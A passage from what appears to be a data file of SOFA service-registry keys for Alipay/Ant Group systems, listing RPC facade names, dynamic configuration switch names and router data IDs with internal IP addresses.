acade.lisa.LisaGateWayProcessor:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.crmhome.common.service.facade.api.whitelist.MerchantWhitelistFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.pointmng:name=com.alipay.pointmng.common.resource.PcreditFreeCardTemplateDrm.defaultLandingPage,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.antfeaturelib.common.facade.service.DataViewCalcService:1.0:sesameCredit_recneptune@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.88.232.131#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.hyp.core.api.HyCheckTaskRunService:1.0:TOOL_ACCOUNT_POOL@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.mybank.bkebank.common.service.facade.BkebankOrderApplyFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Pub_Servers_TP_M_UTP_*#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.securityexprod.common.service.facade.eworkcard.EWorkCardScanLoginFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.autobizcore.common.fundamental.datafacade.TestUserFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA_PRC_TRANSMIT_CLIENTSC#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.loancore.friendloan.service.facade.api.query.FlcBudgetQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Pub_Servers_TP_XY_TEST0726_01#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","config:com.alipay.sofa.rpc.elastic.ElasticService:1.0:dchainconfigcenter@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","DATA_ID_11.166.189.58#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.agdscsalipay.common.service.facade.ruleconfig.AgdsClientConfigFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.zdatacontextTBaseCache.nativeRuleZones,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.insxhbprod.apportion.service.ActivePaymentService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.23.244.28#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.opsconfreg.common.service.facade.ConfregDataInfoQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.83.88.83#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","DATA_ID_11.158.105.221#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.omocore.common.file.api.FileManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cloud.apyunqing.facade.ProdGroupFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.finsecurity.common.service.facade.emergency.ApiFactoryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fundboss.common.service.facade.risk.FundRiskConsultService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.swiftweb.facade.StaticServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA_PRC_TRANSMIT_FINPROMOPROD#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.nodejs.ConsumerService:1.0:gzmshmp-hbmarket@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.fc.custcenterprod.biz.service.mobilegw.AcquireGwFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.progov.service.api.OrderGovFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pcreditauthcore.service.PcreditAuthSignFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:antgraphfeaturemeta@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mitemcenter.common.service.facade.api.query.ItemQueryFacadeV2:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.xview.core.common.facade.CacheQueryProviderService:1.0:kabaoprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilegw.adapterservice.mosng.MosngAdapterService:1.0:mobilecodec@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.linepay.common.serivce.facade.task.DynamicTaskService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.frservcenter.facade.api.ProductFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.124.128.143#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.securitycap:name=com.alipay.cif.model.cache.CifCOControlSwitch.switchCurUserStatus,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.supergw.service.facade.transaction.RecoverService:1.0:FINFUND@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.iriskservice.common.service.model.probe.spi.RiskEventTraceProbeService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.83.50.178#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.mrchprod.api.ops.genericinvoke.SofaServiceHelper:1.0:mif@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mrchcommerce.mrchlabcore.common.service.facade.api.scence.SceneOpenRecordQueryGzoneFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilecodec.service.facade.OfflineIotPaySwitcherFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.gffund.common.service.facade.api.StandardVoucherClaimFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mnotify.biz.client.client.rpc.MNotifyPluginRPCService:1.0:zmhatcher@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.insttrade:name=com.alipay.insttrade.core.service.drm.PaycoreDrmSwitch.newBranchPdCodeList,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.finbaservice.common.service.facade.auth.api.AuthUserCheckFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.83.84.242#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.quickrun.common.service.api.DataRunFacade:1.0:girisk@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.antopo.common.service.facade.biz.halevel.AppHaLevelQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_10.0.0.3#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.bizprodmng:name=com.alipay.cif.utils.probe.ProbeDrmSwitch.reportDelay,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_100.88.133.243#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","DATA_ID_11.124.143.212#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.ifxquote.service.facade.backstage.IfxUiRuleMngFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Sub_Servers_TP_S_DATA_COLLABORATION#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","cn.com.antcloud.acparamcore.facade.api.TableFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.lendpofprod.common.service.facade.loanapi.repay.LoanRepayBudgetFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.ipay.ifundcontrolmodel.service.facade.common.IFundModelFacade:1.0:costFeeDetailFundModel@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:bkdepmng_mmTreatyFixedOpenCallback@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finstrategy.common.service.facade.fixedinvestment.FinstrategyUnionQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.loancore.common.service.facade.alipay.api.ZlcAccountService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.rcdprod.facade.api.SysParaManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Servers_TP_O_VICEROYCOMMON#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","config:com.alipay.certify.service.facade.CertifyManageFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","NS_Sub_Servers_TP_C_PAY#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","Alipay.ordermng:name=com.alipay.ordermng.common.util.drm.GrayDRM.openGrayEvent,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.secucommunity.common.service.facade.subscribe.api.SubscribeQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilepep.common.acl.PermissionService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.financingcore.moneyfund.facade.api.MFundWithdrawService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.alcorporation.biz.service.messager.MessagerService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.insttrade:name=com.alipay.cif.model.cache.CifCOControlSwitch.writeCustProp,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","config:com.alipay.sofa.rpc.elastic.ElasticService:1.0:astaralarm@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","config:com.test.facade.SampleService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","Alipay.cloudlego:name=com.alipay.common.security.dresource.SecurityCommonDrm.refererCheckerDeny,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.opscloudcore.common.service.facade.execute.callback.ChangeServiceCheckCallback:1.0:opscloudflow@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mrchprod.common.service.facade.merchant.MrchProdQuestionFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.memberprod.mashup.service.account.close.QueryCloseProcessService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.promox.facade.property.PropertyServiceFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finfundprod.common.service.facade.FundSaleStatisticsFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.158.43.31#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.finfocore:name=com.alipay.finfocore.common.service.integration.drm.DrmCdsLdcManager.localCacheDebugFlag,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.insttrade:name=com.alipay.echo.platform.core.drm.EchoRecordConfigDrm.recordStatus,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.alphaq.common.facade.label.api.LabelUserService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","cn.com.antcloud.diag.common.service.facade.AnalyzerFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.amap.aos.channel.service.api.channel.antinvoice.ChannelAntInvoiceOrderHSFService:1.0@tri#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.iriskservice.common.service.model.probe.spi.FillerPluginProbeService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.20.142.12#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","DATA_ID_30.52.100.128#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.qconsole.facade.openapi.conf.topic.AntqTopicOpenApiFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","DATA_ID_10.15.247.60#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.securitydataproc:name=com.alipay.securitydata.common.service.integration.antq.impl.drm.AntQSendResource.antEventList,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","cn.com.antcloud.acassistant.common.service.facade.DocumentContributionFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.pointcore.common.mpoint.facade.MpointInstructionQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finaicontentcore.api.search.SearchFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finscprod.waitersupport.facade.SsmProfitAwardFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.openmq.common.service.facade.MessageCallbackService:1.0:fundapplication@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.umidcheck.common.service.facade.UmidVerify:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.antfeaturecloud.common.service.facade.FeatureComputingFacade:1.0:microloan@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","Alipay.zdaljdbc:name=com.alipay.zdal.monitor.drm.riskmng.pmcShineDataSource.failOnPhysicalInit,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.securitydata:name=com.alipay.securitydata.common.service.indicator.IndicatorPreCalculateResource.timeoutThreshold,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.charge:name=com.alipay.cif.client.drm.PerformanceSwitcher.whiteListStr,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.finstore.common.service.facade.fop.mng.CampaignGrayFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.girisk.core.strategy.service.api.EventDataBuilderService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Pub_Servers_TP_C_MOBILE_MGMT_*#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","Alipay.pointmng:name=com.alipay.pointmng.common.service.integration.drm.VoucherConfigResource.bizExchangeProducts,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipayplus.mobile.component.codec.repository.cache.CodeBizConfigCache:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.zqualitywalleetoe.common.service.integration.proxy.WalleProxy:1.0:execute-tr-offline@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.lifemng.facade.pucprod.EbppSystemParamServiceFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.adbasiclib.ad.facade.AdServiceFacade:1.0:adexchange@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fin.pdcore.common.service.facade.adapter.AdapterProductServiceFacade:1.0:finpdcorewealth@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.ck:name=com.alipay.zdal.config.groupCluster.mdap_dds_oss_dev.ck,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","NS_Pub_Servers_TP_O_RC_*#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.iopencore.common.service.facade.api.ContractTplService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mrchservbase.biz.service.mrchprop.facade.MrchPropServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.rinsight.common.base.spi.RinsightCommonRpcSpi:1.0:userInfo@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobileic.common.adapter.prod.ca.CertDetailStorage:1.0:externCertDetailStorage@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.cityVipSwitch:name=com.alipay.zoneclient.internal.DynamicLdcSwitchResource.cityVipSwitch,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.etetestcore.service.api.kbticketcenter.KbtOperateUseTicketService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.voucherprod.facade.api.product.VcpSystemConfigQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.openitemcore.common.service.facade.api.itemextends.ItemExtendsConfigFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.iexpbizprod:name=com.alipay.zcache.tbase.iWFBizProdCommonCacheTBaseCache.localCacheSwitch,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.antfeaturecloud.common.service.facade.FeatureComputingFacade:1.0:alb@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finorm.finriskcenter.common.facade.api.guardian.BizEventServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.socplt.common.service.facade.RiskEventService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","DATA_ID_100.88.113.123#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.antforest.common.service.facade.ForestTrGzoneService:1.0:antforest@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.progov.service.api.ContactsInfoQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.charityprod.common.donate.service.facade.CommonDonateQueryGZFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.cloudengine:name=com.alipay.cloudengine.resmanager.customscenter.resValue,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_11.124.176.64#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.minitrans.service.facade.unifiedcredit.api.UctransManageFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Sub_Servers_TP_S_INSSCENE#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.kbasecore.service.basic.cluster.facade.BasicClusterQuestionService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.findecision:name=com.alipay.findecision.biz.monitor.custom.drm.KeyBizIndexResource.monitorKeyIndex,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_11.124.3.235#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.audit.common.service.facade.StrategyPublishRollbackService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.stocksupervise.common.service.facade.InstConfigFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finslip.common.service.facade.notify.RemedyNotifyService:1.0:remedyInstfluxcore@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.mobileacauth.service.device.facade.IotDeviceInfoFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","config:com.alipay.qtmng.hds.facade.HdsFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.paycore.service.payment.asset.AssetFluxService:1.0:vouchercore@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finnet.service.facade.flux.FinnetFluxOutwardService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.selectcore.common.service.facade.api.ControlListQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:innertrans@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.69.243.222#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.mobileaix.common.service.facade.MobileAiFeatureCategoryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.promokernel.common.service.facade.api.PrizeRecommendReceiveFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.changeriskmanage.common.service.facade.ChangeInfoQueryFacade:1.0:ipayChangeInfoQueryFacade@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA_PRC_TRANSMIT_SANDBOXHOME#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.afsc.common.service.ruleengine.service.RuleEngineFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finpwm:name=com.alipay.finpwm.aip.detail.drm.AipOrderDRMResource.recalWriteSerialIds,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.habaseline.common.facade.view.troublehunter.service.THBizScenarioQueryDayuServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zpaas:name=com.alipay.sofa.middleware.switcher.drm.GlobalSwitchResource.jdkSerializeBlackList,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","config:com.alipay.yqcore.common.service.ha3.api.Ha3OperateFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.mobiletms.common.service.facade.TemplateService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.unitestcenter.falcon.common.facade.DebugInvokeFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.88.185.186#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.antcloud.esp.hbase.interfaces.endpoint.facade.rest.HbaseRestFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","Alipay.pointmng:name=com.alipay.pointprod.common.util.resource.PointCapacityDrmResouce.businessShutdown,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.finpromoprod.common.service.facade.search.ContentSearchFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.framodel.core.service.facade.api.FramodelMonitorRepoFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ap.apshopcenter.common.service.facade.SystemConfigFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zskynet:name=com.alipay.zoneclient.internal.DynamicLdcSwitchResource.cityVipSwitch,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_30.50.122.70#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.revtrans:name=com.alipay.antvip.client.internal.drm.DrmControl.restrainStrategy,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.quotstore.api.FalconQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Pub_Servers_TP_M_FCTCENTER#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.kbsales.common.service.facade.bcm.BPProcessCallbackFacade:1.0:kbbp_unique_goods_mark_label_node_bPProcessCallbackFacade@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.83.117.222#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.promoprod.common.service.facade.isv.IsvCampSourceRecordService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ordercore.mrch.common.service.api.BatchQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobileacauth.service.terminal.facade.TerminalUserService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Pub_Servers_TP-consume-msgsned#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","Alipay.zappinfo:name=com.alipay.common.security.util.dresource.SecurityCommonUtilDrm.vmEmergencyEnable,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.sofa.rpc.elastic.ElasticService:1.0:gfrental@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.financeprod.service.facade.RiskValRecordFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.routeclient.interfacename:sffgroup-tfjstest#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","DATA_ID_30.45.77.80#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.secucommunity.common.service.facade.quiz.api.QuizContentFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbcomment.common.service.facade.api.reply.ReplyQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Pub_Servers_TP_C_EVOUCHER#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.inslifequality.common.facade.AnalogCalculateFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zcache:name=com.alipay.zdal.ldc.tair.revtransTairCache.tbaseClientWarmup,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.securitycore.common.service.facade.aliedit.AlieditDecryptService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.promokernel.common.manage.facade.api.TaskManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.opensupport.common.service.facade.cloudparse.CloudparseFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.financeprod:name=com.alipay.antvip.client.internal.drm.DrmControl.restrainEnable,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","SOFA_PRC_TRANSMIT_IGAUSSCN#@#DEFAULT_INSTANCE_ID#@#SOFA","cn.com.antcloud.acoffercenter.common.service.facade.attr.AttrQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finadvisorprod.common.service.facade.api.CommunicateFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.finfocoreTairCache.refresh,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.rulemng.common.service.facade.rule.RuleManageService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.lifemng.facade.ebppgw.CommunicationConfFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_10.15.244.32#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","DATA_ID_100.83.217.242#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","DATA_ID_11.166.229.229#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.findecision:name=com.alipay.common.security.dresource.SecurityCommonDrm.totalUrlDecodeTimes,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.finrtcalcenter.common.service.facade.dfinsight.analyse.TraitStageIsolationFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.predictproxy.ModelPredictService:1.0:predictproxyint@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.combmng.common.service.facade.user.ViewUserAccountBankService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.rccenter.common.service.facade.RccenterPortalDataUtilFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:pcreditquery@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.loginsession.service.SessionManagerServiceFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.octopus.core.facade.InvokeFacade:1.0:spcenter@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.minicenter.common.service.facade.api.query.MiniAppQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.lifeprod.common.service.facade.api.article.LifeReadFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.166.171.240#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.antsycm.common.service.facade.UserConfigFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cif.facade.BalanceFreezeQueryService:1.0@DEFAULT@cashiercloud_taobao#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finpwm:name=com.alipay.finpwm.biz.starwish.drm.impl.StarWishDrmImpl.maxTargetAmount,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mrchportalcore.common.service.activity.facade.gzone.limit.LimitServiceGzoneFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.c